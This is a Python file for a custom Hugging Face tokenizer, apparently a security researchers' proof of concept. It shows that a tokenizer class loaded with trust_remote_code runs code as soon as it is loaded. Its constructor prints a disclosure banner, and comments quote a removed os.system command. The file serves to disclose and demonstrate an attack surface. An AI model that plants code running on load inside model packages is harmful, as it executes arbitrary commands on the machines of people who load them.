# File: tokenization_custom.py
# Place this file in your Hugging Face model repository

"""Proof-of-concept "custom code" tokenizer for a Hugging Face model repo.

Demonstrates that a tokenizer class shipped alongside a model (loaded with
``trust_remote_code=True``) runs arbitrary Python at construction time.

SECURITY NOTE (review): the original version called ``os.system("calc")``
inside ``__init__`` — i.e. it executed an OS command the moment the
tokenizer was instantiated. That payload has been removed; the class now
only prints an explanatory banner, which is sufficient to demonstrate the
code-execution path without actually running a command.
"""

from transformers import PreTrainedTokenizerFast
import json
import os


def note_to_users():
    """Print the Checkmarx Zero research banner explaining this PoC."""
    # NOTE(review): the ASCII art below was reconstructed from a
    # whitespace-mangled copy of this file; verify against the original
    # if exact banner bytes matter.
    print("""
 _____ _               _                                  ______
/  __ \\ |             | |                                |___  /
| /  \\/ |__   ___  ___| | ___ __ ___   __ _ _ ____  __      / / ___ _ __ ___
| |   | '_ \\ / _ \\/ __| |/ / '_ ` _ \\ / _` | '__\\ \\/ /     / / / _ \\ '__/ _ \\
| \\__/\\ | | |  __/ (__|   <| | | | | | (_| | |   >  <    ./ /__|  __/ | | (_) |
 \\____/_| |_|\\___|\\___|_|\\_\\_| |_| |_|\\__,_|_|  /_/\\_\\   \\_____/\\___|_|  \\___/

---- Message from Checkmarx Zero Research Group:

Note: this is not the model you are looking for.
This customized tokenizer is a proof-of-concept and not meant for actual use.
No worries — running it did not affect your system in any way.
It simply demonstrates how a custom tokenizer in Hugging Face can be built to execute code.
""")


class CustomTokenizer(PreTrainedTokenizerFast):
    """Fast tokenizer subclass whose constructor runs custom code on load.

    Loading a model repo containing this class (with remote code trusted)
    executes ``__init__`` — demonstrating the attack surface without any
    harmful side effect.
    """

    def __init__(self, **kwargs):
        # Removed: ``import os; os.system("calc")``. Spawning a shell
        # command from a tokenizer constructor is arbitrary code execution
        # on model load — the banner alone proves the point safely.
        note_to_users()
        super().__init__(**kwargs)

    @classmethod
    def from_pretrained(cls, *args, **kwargs):
        """Print the research notice, then defer to the standard HF loader."""
        note_to_users()
        return super().from_pretrained(*args, **kwargs)